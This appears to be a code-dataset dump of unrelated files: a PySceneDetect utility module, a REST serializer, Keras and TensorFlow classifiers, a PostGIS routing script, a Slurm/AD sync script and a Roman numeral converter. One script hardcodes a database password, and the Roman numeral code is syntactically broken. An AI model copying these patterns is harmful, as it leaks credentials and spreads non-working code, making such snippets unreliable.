| permissive | https://github.com/wjs018/PySceneDetect | 4d663ca03d236ea031c2e31423cef341a7d4183e | 456ed933ebf5d4c222c0458fc90b06bc9a3500c5 | refs/heads/master | 2023-07-05T08:13:30.564699 | 2023-05-22T00:56:07 | 2023-05-22T00:56:07 | 159,362,599 | 0 | 0 | NOASSERTION | true | 2018-11-27T16:05:54 | 2018-11-27T16:05:54 | 2018-11-26T14:36:09 | 2018-09-23T19:48:31 | 56,098 | 0 | 0 | 0 | null | false | null | # -*- coding: utf-8 -*-
#
# PySceneDetect: Python-Based Video Scene Detector
# ---------------------------------------------------------------
# [ Site: http://www.scenedetect.scenedetect.com/ ]
# [ Docs: http://manual.scenedetect.scenedetect.com/ ]
# [ Github: https://github.com/Breakthrough/PySceneDetect/ ]
#
# Copyright (C) 2014-2022 Brandon Castellano <http://www.bcastell.com>.
# PySceneDetect is licensed under the BSD 3-Clause License; see the
# included LICENSE file, or visit one of the above pages for details.
#
""" ``scenedetect.platform`` Module
This moduke contains all platform/library specific compatibility fixes, as well as some utility
functions to handle logging and invoking external commands.
"""
import importlib
import logging
import os
import os.path
import platform
import subprocess
import sys
from typing import AnyStr, Dict, List, Optional, Union
import cv2
##
## tqdm Library
##
class FakeTqdmObject:
"""Provides a no-op tqdm-like object."""
# pylint: disable=unused-argument
def __init__(self, **kawrgs):
"""No-op."""
def update(self, n=1):
"""No-op."""
def close(self):
"""No-op."""
def set_description(self, desc=None, refresh=True):
"""No-op."""
# pylint: enable=unused-argument
class FakeTqdmLoggingRedirect:
"""Provides a no-op tqdm context manager for redirecting log messages."""
# pylint: disable=redefined-builtin,unused-argument
def __init__(self, **kawrgs):
"""No-op."""
def __enter__(self):
"""No-op."""
def __exit__(self, type, value, traceback):
"""No-op."""
# pylint: enable=redefined-builtin,unused-argument
# Try to import tqdm and the logging redirect, otherwise provide fake implementations..
try:
# pylint: disable=unused-import
from tqdm import tqdm
from tqdm.contrib.logging import logging_redirect_tqdm
# pylint: enable=unused-import
except ModuleNotFoundError:
# pylint: disable=invalid-name
tqdm = FakeTqdmObject
logging_redirect_tqdm = FakeTqdmLoggingRedirect
# pylint: enable=invalid-name
##
## OpenCV imwrite Supported Image Types & Quality/Compression Parameters
##
# TODO: Move this into scene_manager.
def get_cv2_imwrite_params() -> Dict[str, Union[int, None]]:
""" Get OpenCV imwrite Params: Returns a dict of supported image formats and
their associated quality/compression parameter index, or None if that format
is not supported.
Returns:
Dictionary of supported image formats/extensions ('jpg', 'png', etc...) mapped to the
respective OpenCV quality or compression parameter as {'jpg': cv2.IMWRITE_JPEG_QUALITY,
'png': cv2.IMWRITE_PNG_COMPRESSION, ...}. Parameter will be None if not found on the
current system library (e.g. {'jpg': None}).
"""
def _get_cv2_param(param_name: str) -> Union[int, None]:
if param_name.startswith('CV_'):
param_name = param_name[3:]
try:
return getattr(cv2, param_name)
except AttributeError:
return None
return {
'jpg': _get_cv2_param('IMWRITE_JPEG_QUALITY'),
'png': _get_cv2_param('IMWRITE_PNG_COMPRESSION'),
'webp': _get_cv2_param('IMWRITE_WEBP_QUALITY')
}
##
## File I/O
##
def get_file_name(file_path: AnyStr, include_extension=True) -> AnyStr:
"""Return the file name that `file_path` refers to, optionally removing the extension.
If `include_extension` is False, the result will always be a str.
E.g. /tmp/foo.bar -> foo"""
file_name = os.path.basename(file_path)
if not include_extension:
file_name = str(file_name)
last_dot_pos = file_name.rfind('.')
if last_dot_pos >= 0:
file_name = file_name[:last_dot_pos]
return file_name
def get_and_create_path(file_path: AnyStr, output_directory: Optional[AnyStr] = None) -> AnyStr:
""" Get & Create Path: Gets and returns the full/absolute path to file_path
in the specified output_directory if set, creating any required directories
along the way.
If file_path is already an absolute path, then output_directory is ignored.
Arguments:
file_path: File name to get path for. If file_path is an absolute
path (e.g. starts at a drive/root), no modification of the path
is performed, only ensuring that all output directories are created.
output_dir: An optional output directory to override the
directory of file_path if it is relative to the working directory.
Returns:
Full path to output file suitable for writing.
"""
# If an output directory is defined and the file path is a relative path, open
# the file handle in the output directory instead of the working directory.
if output_directory is not None and not os.path.isabs(file_path):
file_path = os.path.join(output_directory, file_path)
# Now that file_path is an absolute path, let's make sure all the directories
# exist for us to start writing files there.
os.makedirs(os.path.split(os.path.abspath(file_path))[0], exist_ok=True)
return file_path
##
## Logging
##
def init_logger(log_level: int = logging.INFO,
show_stdout: bool = False,
log_file: Optional[str] = None):
"""Initializes logging for PySceneDetect. The logger instance used is named 'pyscenedetect'.
By default the logger has no handlers to suppress output. All existing log handlers are replaced
every time this function is invoked.
Arguments:
log_level: Verbosity of log messages. Should be one of [logging.INFO, logging.DEBUG,
logging.WARNING, logging.ERROR, logging.CRITICAL].
show_stdout: If True, add handler to show log messages on stdout (default: False).
log_file: If set, add handler to dump log messages to given file path.
"""
# Format of log messages depends on verbosity.
format_str = '[PySceneDetect] %(message)s'
if log_level == logging.DEBUG:
format_str = '%(levelname)s: %(module)s.%(funcName)s(): %(message)s'
# Get the named logger and remove any existing handlers.
logger_instance = logging.getLogger('pyscenedetect')
logger_instance.handlers = []
logger_instance.setLevel(log_level)
# Add stdout handler if required.
if show_stdout:
handler = logging.StreamHandler(stream=sys.stdout)
handler.setLevel(log_level)
handler.setFormatter(logging.Formatter(fmt=format_str))
logger_instance.addHandler(handler)
# Add file handler if required.
if log_file:
log_file = get_and_create_path(log_file)
handler = logging.FileHandler(log_file)
handler.setLevel(log_level)
handler.setFormatter(logging.Formatter(fmt=format_str))
logger_instance.addHandler(handler)
##
## Running External Commands
##
class CommandTooLong(Exception):
"""Raised if the length of a command line argument exceeds the limit allowed on Windows."""
def invoke_command(args: List[str]) -> int:
""" Same as calling Python's subprocess.call() method, but explicitly
raises a different exception when the command length is too long.
See https://github.com/Breakthrough/PySceneDetect/issues/164 for details.
Arguments:
args: List of strings to pass to subprocess.call().
Returns:
Return code of command.
Raises:
CommandTooLong: `args` exceeds built in command line length limit on Windows.
"""
try:
return subprocess.call(args)
except OSError as err:
if os.name != 'nt':
raise
exception_string = str(err)
# Error 206: The filename or extension is too long
# Error 87: The parameter is incorrect
to_match = ('206', '87')
if any([x in exception_string for x in to_match]):
raise CommandTooLong() from err
raise
def get_ffmpeg_path() -> Optional[str]:
"""Get path to ffmpeg if available on the current system, or None if not available."""
# Prefer using ffmpeg if it already exists in PATH.
try:
subprocess.call(['ffmpeg', '-v', 'quiet'])
return 'ffmpeg'
except OSError:
pass
# Failed to invoke ffmpeg from PATH, see if we have a copy from imageio_ffmpeg.
try:
# pylint: disable=import-outside-toplevel
from imageio_ffmpeg import get_ffmpeg_exe
# pylint: enable=import-outside-toplevel
subprocess.call([get_ffmpeg_exe(), '-v', 'quiet'])
return get_ffmpeg_exe()
# Gracefully handle case where imageio_ffmpeg is not available.
except ModuleNotFoundError:
pass
# Handle case where path might be wrong/non-existent.
except OSError:
pass
# get_ffmpeg_exe may throw a RuntimeError if the executable is not available.
except RuntimeError:
pass
return None
def get_ffmpeg_version() -> Optional[str]:
"""Get ffmpeg version identifier, or None if ffmpeg is not found. Uses `get_ffmpeg_path()`."""
ffmpeg_path = get_ffmpeg_path()
if ffmpeg_path is None:
return None
# If get_ffmpeg_path() returns a value, the path it returns should be invokable.
output = subprocess.check_output(args=[ffmpeg_path, '-version'], text=True)
output_split = output.split()
if len(output_split) >= 3 and output_split[1] == 'version':
return output_split[2]
# If parsing the version fails, return the entire first line of output.
return output.splitlines()[0]
def get_mkvmerge_version() -> Optional[str]:
"""Get mkvmerge version identifier, or None if mkvmerge is not found in PATH."""
tool_name = 'mkvmerge'
try:
output = subprocess.check_output(args=[tool_name, '--version'], text=True)
except FileNotFoundError:
return None
output_split = output.split()
if len(output_split) >= 1 and output_split[0] == tool_name:
return ' '.join(output_split[1:])
# If parsing the version fails, return the entire first line of output.
return output.splitlines()[0]
def get_system_version_info() -> str:
"""Get the system's operating system, Python, packages, and external tool versions.
Useful for debugging or filing bug reports.
Used for the `scenedetect version -a` command.
"""
output_template = '{:<12} {}'
line_separator = '-' * 60
not_found_str = '[Not Found]'
out_lines = []
# System (Python, OS)
out_lines += ['System Version Info', line_separator]
out_lines += [
output_template.format(name, version) for name, version in (
('OS', '%s' % platform.platform()),
('Python', '%d.%d.%d' % sys.version_info[0:3]),
)
]
# Third-Party Packages
out_lines += ['', 'Package Version Info', line_separator]
backend_modules = (
'appdirs',
'av',
'click',
'cv2',
'moviepy',
'numpy',
'tqdm',
)
for module_name in backend_modules:
try:
module = importlib.import_module(module_name)
out_lines.append(output_template.format(module_name, module.__version__))
except ModuleNotFoundError:
out_lines.append(output_template.format(module_name, not_found_str))
# External Tools
out_lines += ['', 'Tool Version Info', line_separator]
tool_version_info = (
('ffmpeg', get_ffmpeg_version()),
('mkvmerge', get_mkvmerge_version()),
)
for (tool_name, tool_version) in tool_version_info:
out_lines.append(
output_template.format(tool_name, tool_version if tool_version else not_found_str))
return '\n'.join(out_lines)
| UTF-8 | Python | false | false | 11,772 | py | 65 | platform.py | 36 | 0.647638 | 0.643306 | 0 | 347 | 32.925072 | 100 |
golian1204/exemples | 4,655,744,551,572 | 9db4c08b9982d62d8b6021a3072c7a16b843adb5 | 5a22f8a55d53ff342b4072622f5f0f590eb2be68 | /mess/serializers/feedback.py | 85ff2b06ff03df4638afb7134bdd1d9d0024cabe | []
| no_license | https://github.com/golian1204/exemples | a4b317f2544aa3796e00652fa9372023e9aafe49 | 294ea708f839919fe20b584533db73dd71837b7b | refs/heads/master | 2021-09-09T21:18:10.729893 | 2018-03-19T19:05:20 | 2018-03-19T19:05:20 | 125,905,286 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from rest_framework import serializers
from mess.models.feedback import Valuation
class ValuationSerializer(serializers.ModelSerializer):
class Meta:
model = Valuation
fields = '__all__'
def create(self, validated_data):
return Valuation.objects.create(**validated_data)
def update(self, instance, validated_data):
instance.scale = validated_data.get('scale', instance.scale)
instance.icon = validated_data.get('icon', instance.icon)
instance.save()
return instance
| UTF-8 | Python | false | false | 538 | py | 51 | feedback.py | 50 | 0.689591 | 0.689591 | 0 | 17 | 30.647059 | 68 |
jianjhu/Inspect | 8,194,797,612,766 | 263c37373e961edd60ccffa58b90a1b67739a938 | 8ceb5b655089c08bcecfab7379d9f9f0dace657a | /Inspector.py | 96e7b449f7b99ae5be91d942f976c19d72ebf25b | [
"Apache-2.0"
]
| permissive | https://github.com/jianjhu/Inspect | 72315675673f27724cc7b650674fb33a2222c27a | 3d16457b555359553b54441d616a5e299fe1550b | refs/heads/master | 2020-03-27T07:20:20.272435 | 2018-09-28T08:48:24 | 2018-09-28T08:48:24 | 146,183,122 | 3 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import keras
import numpy
from datasethdr import get_dataset3
from datasethdr import n, m
voice_train_files = ['DataSet/Voice.csv']
no_voice_train_files = ['DataSet/noVoice.csv']
webex_normalshare_train_files = ['DataSet/normalshare']
highFPS_train_files = ['DataSet/HighFPS.csv']
webex_ppt_train_files = ['DataSet/highfps_ppt.csv', 'DataSet/normal_ppt.csv']
webex_video_train_files = ['DataSet/highfps_video.csv', 'DataSet/normal_video.csv']
WEBEX_PPT_LABEL = 0
WEBEX_VIDEO_LABEL = 1
VOICE_LABEL = 2
OTHER_LABEL = 3
src = '10.224.168.94'
batch_size = 128
num_classes = 4
epochs = 10
input_shape = (n, 2 * m)
if __name__ == '__main__':
webex_ppt_train_dataset = None
for fi in webex_ppt_train_files:
dataset = get_dataset3(fi, '10.224.168.94')
# draw_dataset(dataset[0])
if webex_ppt_train_dataset is None:
webex_ppt_train_dataset = dataset
else:
webex_ppt_train_dataset += dataset
ppt_train_label = [WEBEX_PPT_LABEL] * len(webex_ppt_train_dataset)
print("get %d ppt train dataset" % len(webex_ppt_train_dataset))
webex_video_train_dataset = None
for fi in webex_video_train_files:
dataset = get_dataset3(fi, '10.224.168.94')
# draw_dataset(dataset[0])
if webex_video_train_dataset is None:
webex_video_train_dataset = dataset
else:
webex_video_train_dataset += dataset
video_train_label = [WEBEX_VIDEO_LABEL] * len(webex_video_train_dataset)
print("get %d video train dataset" % len(webex_video_train_dataset))
for fi in voice_train_files:
voice_train_dataset = get_dataset3(fi, '192.168.31.219')
voice_train_label = [VOICE_LABEL] * len(voice_train_dataset)
# draw_dataset(voice_train_dataset[0])
print("get %d voice train dataset"%len(voice_train_dataset))
for fi in no_voice_train_files:
other_train_dataset = get_dataset3(fi, '192.168.31.219')
other_train_label = [OTHER_LABEL] * len(other_train_dataset)
#draw_dataset(other_train_dataset[0])
print("get %d other train dataset"%len(other_train_dataset))
x_train = webex_ppt_train_dataset + webex_video_train_dataset + voice_train_dataset + other_train_dataset
y_train = ppt_train_label + video_train_label + voice_train_label + other_train_label
test_data_num = len(x_train) / 10
import random
index = [i for i in range(len(x_train))]
random.shuffle(index)
data = []
label = []
for i in index:
data.append(x_train[i])
label.append(y_train[i])
x_train = data[:-test_data_num]
y_train = label[:-test_data_num]
x_train = numpy.array(x_train)
print x_train.shape
x_train = x_train.reshape((x_train.shape[0], x_train.shape[1], x_train.shape[2] * x_train.shape[3]))
y_train = keras.utils.to_categorical(y_train, num_classes)
print y_train.shape
x_test = data[-test_data_num:]
x_test = numpy.array(x_test)
print x_test.shape
x_test = x_test.reshape((x_test.shape[0], x_test.shape[1], x_test.shape[2] * x_test.shape[3]))
y_test = label[-test_data_num:]
y_test = keras.utils.to_categorical(y_test, num_classes)
print y_test.shape
from keras.layers import LSTM
from keras.models import Sequential
from keras.layers import Conv1D
from keras.layers import Dense
from keras.layers import Dropout
model = Sequential()
model.add(Conv1D(32, n / 10 + 1, input_shape=input_shape))
model.add(LSTM(128))
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
tb_cb = keras.callbacks.TensorBoard(log_dir='keras_log', write_images=1, histogram_freq=1)
model.fit(x_train, y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
callbacks=[tb_cb],
validation_data=(x_test, y_test))
x_ev = x_test
y_ev = y_test
score = model.evaluate(x_ev, y_ev, verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
model.save('inspect.h5')
| UTF-8 | Python | false | false | 4,285 | py | 11 | Inspector.py | 5 | 0.641774 | 0.617503 | 0 | 126 | 33 | 109 |
FRANKSADWAR/HedonicHouseModels | 5,909,875,043,856 | aacfd2bf40d084c11b6c00f65a3dae8cf866793a | 5928dc0c33e19a95571b53b6a7670d87dba1f594 | /route_test.py | fd36b56ff2fe3fc26d4f293b4579538520c813e9 | [
"Apache-2.0"
]
| permissive | https://github.com/FRANKSADWAR/HedonicHouseModels | cdc85745d15a81e3740e6d813e09cf9aca48f7af | 243dbe08c6798a87efe86fcc9ed2e14745769c78 | refs/heads/main | 2022-12-27T12:34:34.616153 | 2020-10-10T11:27:21 | 2020-10-10T11:27:21 | 302,886,041 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import traceback
from django.contrib.gis import db
from django.db import connection,connections
from geojson import loads,Feature,FeatureCollection
import geojson
import psycopg2
import json
import math
import logging
logger = logging.getLogger(__name__)
database = 'routes_test'
user = 'postgres'
password = 'RootRender90'
conn = psycopg2.connect(database=database,user=user,password=password)
def getNearest(x,y):
"""
params : x
: y
using the k-nearest neighbour to get the nearest vertex given a set of coordinates
"""
query = """
SELECT id FROM ways_noded_vertices_pgr ORDER BY
the_geom <-> ST_SetSRID(ST_Point(%s,%s),4326) LIMIT 1;
"""
cur = conn.cursor()
cur.execute(query,(x,y))
point = cur.fetchone()
return point
def getShortest(gid):
"""
This query runs the pgr_dijkstra algorithm to return the shortest route between
start and end nodes.
param gid: id of the nearest vertex to the store returned by the getNearest function
"""
start_id = getNearest(36.852721,-1.313261)
query_sho = """
SELECT dijkstra.*,ST_AsGeoJSON(ways_noded.the_geom) as route_geom,ways_noded.length FROM
pgr_dijkstra('SELECT id,source,target,cost,reverse_cost FROM ways_noded',85038,%s)
AS dijkstra LEFT JOIN ways_noded ON (edge=id);
"""
cur = conn.cursor()
cur.execute(query_sho,gid)
data = cur.fetchall()
last_row = data.pop() # remove the last row since it has no geometry information and also has a NoneType value for length
route_result = []
route_length = []
total_cost = last_row[5] # the index 5 of the last row gives the aggregate cost of the route, get it as the total cost of the route
# iterate over the query results to get the route geometryand length
for seg in data:
lens = seg[7] # get the length value of each segment
seg_geom = seg[6] # get the geometry value of each segment
seg_geom_geojs = loads(seg_geom) # load the geometry as geojson, the geometry is Type string, so it allows loading as geojson
seg_feature = Feature(geometry=seg_geom_geojs,properties={}) # create a feature of the loaded geometries
route_length.append(lens) # append all the length values to this list in order to sum them later
route_result.append(seg_feature) # append all the created features to create a feature collection later
length_in_km = round(sum(route_length),2)
# create a feature collection from the features returned
route_details = FeatureCollection(route_result,distance_in_Km=length_in_km,time_in_minutes=total_cost)
try:
return str(route_details)
except:
logger.error("Error while creating GeoJSON file" + str(route_details))
logger.error(traceback.format_exc())
def getStoreXY():
query = """
SELECT x,y from stores;
"""
cur = conn.cursor()
cur.execute(query)
rows = cur.fetchall()
return rows
if __name__ == "__main__":
fr = getNearest(36.940559,-1.368009)
#if run as top level module
dataset = getShortest(fr)
print(dataset)
| UTF-8 | Python | false | false | 3,300 | py | 1 | route_test.py | 1 | 0.647273 | 0.632424 | 0 | 91 | 35.032967 | 136 |
CaMeLCa5e/TechnicalExamples | 7,765,300,901,265 | c9505a8ddf6a0102a3d1f2ff2215b98b95acff42 | 308a5086eba8414cd5174de4ebb8b54ab4b50012 | /RomanNumeral.py | 73be1770982f42bc78fa8ddefcfd8c4b1aada34b | []
| no_license | https://github.com/CaMeLCa5e/TechnicalExamples | cde8231ab248449e11ce3677f8ee718b9c940903 | 655b1911ceda92b9c981d7697652ae5b545f3cbf | refs/heads/master | 2021-01-23T05:45:55.354422 | 2014-10-22T03:44:36 | 2014-10-22T03:44:36 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
3. Write a method that converts its argument from integer to roman numeral """
import re
#Define exceptions
class roman_error (exception): pass
class out_of_range_error(roman_error): pass
class not_integer_error(roman_error): pass
class bad_roman_numeral_error (roman_error): pass
#Define conversion map
roman_numeral_map = (('M', 1000),
('CM', 900),
('D', 500),
('CD', 400)
('C', 100)
('XC', 90)
('L', 50)
('XL', 40)
('X', 10)
('IX', 9)
('V', 5)
('IV', 4)
('I', 1))
def to_roman(n):
#convert int to roman numeral
if not (0 < n < 4000):
raise out_of_range_error,
if int (n) <> n:
raise not_integer_error #can't convert a number that is not an int.
result = ''
for numeral, integer in roman_numeral_map
while n >= integer:
result += numeral
n-= integer
return result
# Define pattern to detect valid roman numerals
roman_numeral_pattern = '^M?M?M?(CM|CD|D?C?C?C?)(XC|XL|L?X?X?X?) (IX|IV|V?I?I?I?)$'
def from_roman(s):
#convert from roman numeral to int
if not re.search(roman_numeral_pattern, s):
raise invalid_roman_numeral_error, 'Invalid Roman numeral: %s' % s
result = 0
index = 0
for numeral, integer in roman_numeral_map:
while s[index:index+len(numeral)] == numeral:
result += integer
index += len(numeral)
return result
| UTF-8 | Python | false | false | 1,325 | py | 8 | RomanNumeral.py | 7 | 0.634717 | 0.607547 | 0 | 57 | 21.596491 | 83 |
codacy-badger/noobit-backend | 14,508,399,546,636 | 1b92dfa9a6e65d24efa3e1d1427c697fb7c10882 | b9abb3c31e98b95b4d21380d929897e70b1a4233 | /models/data_models/users.py | b7e7ecdd5f832da3328d10fa73b9cdb0eb0d5c5b | []
| no_license | https://github.com/codacy-badger/noobit-backend | 8b3cc4838990c08a1a830dce833a73c0a900f68c | 874372803d709d078947b38024856a926763fff4 | refs/heads/master | 2022-04-07T22:15:16.681500 | 2020-03-25T20:45:35 | 2020-03-25T20:45:35 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from fastapi_users import models
# FastAPI-Users models
class User(models.BaseUser):
pass
class UserCreate(User, models.BaseUserCreate):
pass
class UserUpdate(User, models.BaseUserUpdate):
pass
class UserDB(User, models.BaseUserDB):
pass
# Our own response model to filter out password and id
from pydantic import BaseModel, EmailStr
class UserDBOut(BaseModel):
email: EmailStr
id: str
class Config:
orm_mode = True
| UTF-8 | Python | false | false | 466 | py | 60 | users.py | 58 | 0.718884 | 0.718884 | 0 | 31 | 14.032258 | 54 |
dazhouxiaoyang/fastapi-pagination | 7,842,610,314,489 | 3678623ec2739dd8c69e547ebcab1d70990d7e10 | b1613ab7bf9b8ff89d24a7b4f4530170235d2fc5 | /tests/ext/test_async_sqlalchemy.py | 99b447d3e1e26db5de93d3b5f7c4ced30b5c4b20 | [
"MIT"
]
| permissive | https://github.com/dazhouxiaoyang/fastapi-pagination | 4352da16372c6bcff16c3c8a87ec0c5edfbc7f51 | 9048334db650ba521f1770e8990760f36beee45c | refs/heads/main | 2023-08-11T03:10:26.174664 | 2021-10-12T06:35:03 | 2021-10-12T06:35:03 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from typing import AsyncIterator
from fastapi import Depends, FastAPI
from pytest import fixture, mark
from sqlalchemy import Column, Integer, String
from sqlalchemy.ext.asyncio import AsyncSession, create_async_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.future import select
from sqlalchemy.orm import sessionmaker
from fastapi_pagination import LimitOffsetPage, Page, add_pagination
from fastapi_pagination.ext.async_sqlalchemy import paginate
from ..base import BasePaginationTestCase, SafeTestClient, UserOut
from ..utils import faker
@fixture(scope="session")
def database_url(database_url) -> str:
database_url = database_url.replace("postgresql", "postgresql+asyncpg", 1)
database_url = database_url.replace("sqlite", "sqlite+aiosqlite", 1)
return database_url
@fixture(scope="session")
def engine(database_url):
return create_async_engine(database_url)
@fixture(scope="session")
def Session(engine):
return sessionmaker(engine, class_=AsyncSession)
@fixture(scope="session")
def Base(engine):
return declarative_base()
@fixture(scope="session")
def User(Base):
class User(Base):
__tablename__ = "users"
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, nullable=False)
return User
@fixture(scope="session")
def app(Base, User, Session, engine):
app = FastAPI()
@app.on_event("startup")
async def on_startup():
async with engine.begin() as conn:
await conn.run_sync(Base.metadata.drop_all)
await conn.run_sync(Base.metadata.create_all)
async with Session() as session:
session.add_all([User(name=faker.name()) for _ in range(100)])
await session.commit()
async def get_db() -> AsyncIterator[Session]:
async with Session() as session:
yield session
@app.get("/default", response_model=Page[UserOut])
@app.get("/limit-offset", response_model=LimitOffsetPage[UserOut])
async def route(db: Session = Depends(get_db)):
return await paginate(db, select(User))
add_pagination(app)
return app
@mark.future_sqlalchemy
class TestAsyncSQLAlchemy(BasePaginationTestCase):
@fixture(scope="session")
def client(self, app):
with SafeTestClient(app) as c:
yield c
@fixture(scope="session")
async def entities(self, Session, User):
async with Session() as session:
result = await session.execute(select(User))
return [*result.scalars()]
| UTF-8 | Python | false | false | 2,572 | py | 13 | test_async_sqlalchemy.py | 9 | 0.695568 | 0.693624 | 0 | 90 | 27.577778 | 78 |
UoM-ResPlat-DevOps/melbourne-tools | 15,255,723,860,635 | aac56de4a44c43937c52d259091b6368746697ba | 9bcc6143ef883c697ccc7a0ceb675ed2db8355ad | /spartan/sync_ad.py | 9f02d214093a330ddd92331f1e1bb0b0419fcc09 | []
| no_license | https://github.com/UoM-ResPlat-DevOps/melbourne-tools | f3ffa848bc2810462911963af279c4d09331758f | 1a955dc5cb6990a564bab8155cf64c2271e69fff | refs/heads/master | 2017-10-12T02:53:38.937272 | 2017-09-27T01:17:50 | 2017-09-27T01:20:06 | 35,392,912 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python
# This script syncs users from AD to Slurm
# It looks up the provided AD accounts and add/deletes users from slurm
# accordingly
import argparse
import subprocess
import os, pdb, sys, traceback
NOOP = False
DEBUG = False
# get list of all slurm accounts
def get_slurm_accounts():
accounts = {}
# sample output
# hpcusers@unimelb.edu.au|
# hpcusers@unimelb.edu.au|user1@unimelb.edu.au
# hpcusers@unimelb.edu.au|user2@unimelb.edu.au
output = subprocess.check_output(['sacctmgr', 'list', 'assoc',
'format=account,user', '--parsable2',
'--noheader'])
try:
for line in output.split('\n'):
account, user = line.split('|')
if user:
accounts.setdefault(account, []).append(user)
except ValueError:
pass
return accounts
# get a list of users/groups from AD
def get_ad_groups(lookup_groups=[]):
groups = {}
for g in lookup_groups:
# sample output
# hpcusers@unimelb.edu.au:*:1234567880:user1@unimelb.edu.au,user2@unimelb.edu.au
try:
output = subprocess.check_output(['getent', 'group', g])
except:
print "ERROR: Can't find AD group %s" % g
continue
output = output.rstrip()
name, passwd, gid, mem = output.split(':')
if len(mem) == 0:
# ad group has users, set it to empty list
groups[g] = []
else:
users = mem.split(',')
for user in users:
groups.setdefault(name, []).append(user)
return groups
# get a list of slurm users from account
def get_slurm_users(account):
accounts = get_slurm_accounts()
return accounts[account]
# delete all slurm users from account
def clear_slurm_accounts(accounts):
for account in accounts:
users = get_slurm_users(account)
del_slurm_users(account, users)
# add users to slurm account
def add_slurm_users(account, users):
for user in users:
args = ['sacctmgr', '--immediate', 'add','user', 'name='+user,
'account='+account]
ret = _call(args)
if ret == 0:
print "Add %s to %s" % (user, account)
else:
print "ERROR! Add %s from %s returns %s" % (user, account, ret)
# delete users from slurm account
def del_slurm_users(account, users):
for user in users:
args =['sacctmgr', '--immediate', 'del', 'user', 'name='+user,
'account='+account]
ret = _call(args)
if ret == 0:
print "Del %s from %s" % (user, account)
else:
print "ERROR! Del %s from %s returns %s" % (user, account, ret)
# create slurm account
def add_slurm_account(account):
print "Creating account %s" % account
args = ['sacctmgr', '--immediate', 'add', 'account', account]
ret = _call(args)
return ret
def add_slurm_account2(account):
try:
print "Creating account %s" % account
args = ['sacctmgr', '--immediate', 'add', 'account', account]
ret = _call(args)
if DEBUG:
print ' '.join(args)
if not NOOP:
FNULL = open(os.devnull, 'w')
subprocess.check_call(args, stdout=FNULL, stderr=subprocess.STDOUT)
return 0
except:
print "Error creating slurm account %s" % account
return 1
# run subprocess.call quietly
# TODO: Make sacctmgr do things quietly so we don't need this
def _call(args):
if DEBUG:
print ' '.join(args)
if not NOOP:
FNULL = open(os.devnull, 'w')
return subprocess.call(args, stdout=FNULL, stderr=subprocess.STDOUT)
else:
return 0
def main(ad_groups=[]):
accounts = get_slurm_accounts()
groups = get_ad_groups(ad_groups)
for ad_group in groups:
ad_users = set(groups[ad_group])
# sometimes an account might not be created in slurm yet
if ad_group not in accounts:
# creates account
ret = add_slurm_account(ad_group)
# if there's an error creating account, skip to next
if ret != 0: continue
# list of users in this account will be blank
slurm_users = set([])
else:
slurm_users = set(accounts[ad_group])
not_in_slurm = ad_users - slurm_users
not_in_ad = slurm_users - ad_users
add_slurm_users(ad_group, not_in_slurm)
del_slurm_users(ad_group, not_in_ad)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Sync AD group to slurm')
parser.add_argument('groups', metavar='group', nargs='+', help='AD group name')
parser.add_argument('-c', '--clear',
help='Clear the group in slurm',
action="store_true")
parser.add_argument('-d', '--debug',
help='Run in debug mode. Print slurm commands executed.',
action="store_true")
parser.add_argument('-n', '--noop',
help='Run in noop mode. Do not actually add users',
action="store_true")
args = parser.parse_args()
ad_groups = args.groups
if args.debug: DEBUG = True
if args.noop:
print "Running in NOOP mode"
NOOP = True
try:
if args.clear:
clear_slurm_accounts(ad_groups)
else:
# main method
main(ad_groups)
except:
type, value, tb = sys.exc_info()
traceback.print_exc()
pdb.post_mortem(tb)
| UTF-8 | Python | false | false | 5,642 | py | 48 | sync_ad.py | 44 | 0.564516 | 0.56044 | 0 | 187 | 29.171123 | 88 |
kysshsy/pai | 7,937,099,595,563 | 462be559260c457f6d0f5908f090a67689472c81 | ea05885d182c99c94aa271a865cdf88224afe5b0 | /test3/digi_recognize.py | 45a16695e08039f3f62528ef7a16eb6f241337c4 | []
| no_license | https://github.com/kysshsy/pai | 9471b6f4f521f6efe754a4b52c2bbddb703ead4e | 50a17e39eb3f96183cebdd68923f7e948654458d | refs/heads/master | 2020-06-06T04:53:06.474180 | 2019-07-02T04:51:54 | 2019-07-02T04:51:54 | 192,642,271 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import pandas as pd
import numpy as np
import tensorflow as tf
# pre_process
def transform_one_hot(labels):
n_labels = np.max(labels) + 1
one_hot = np.eye(n_labels)[labels]
return one_hot
train_data = pd.read_csv("train.csv")
img = train_data.values[:,1:]
label = train_data.values[:,0]
train_img = img.astype(np.float64)
train_label = transform_one_hot(label)
test_img = pd.read_csv("test.csv")
test_img = test_img.astype(np.float64)
x = tf.placeholder("float", [None, 784])
y_= tf.placeholder("float", [None, 10])
W = tf.Variable(tf.zeros([784,10]))
b = tf.Variable(tf.zeros([10]))
y = tf.nn.softmax(tf.matmul(x,W) + b)
cross_entropy = -tf.reduce_sum(y_*tf.log(tf.clip_by_value(y,1e-10,1.0)))
train_step = tf.train.GradientDescentOptimizer(0.0000001).minimize(cross_entropy)
# 参数无法更新/ 向错误的方向更新 目测是数据预处理出现了问题
correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float"))
init = tf.initialize_all_variables()
with tf.Session() as sess:
sess.run(init)
for i in range(1000):
batch_size = 100
index = np.random.choice(a=42000, size=batch_size)
sess.run(train_step, feed_dict={x: train_img[index], y_: train_label[index]})
print(sess.run(accuracy, feed_dict={x: train_img, y_: train_label}))
result = sess.run(y, feed_dict={x: test_img})
print(result)
lenth = len(result)
print(lenth)
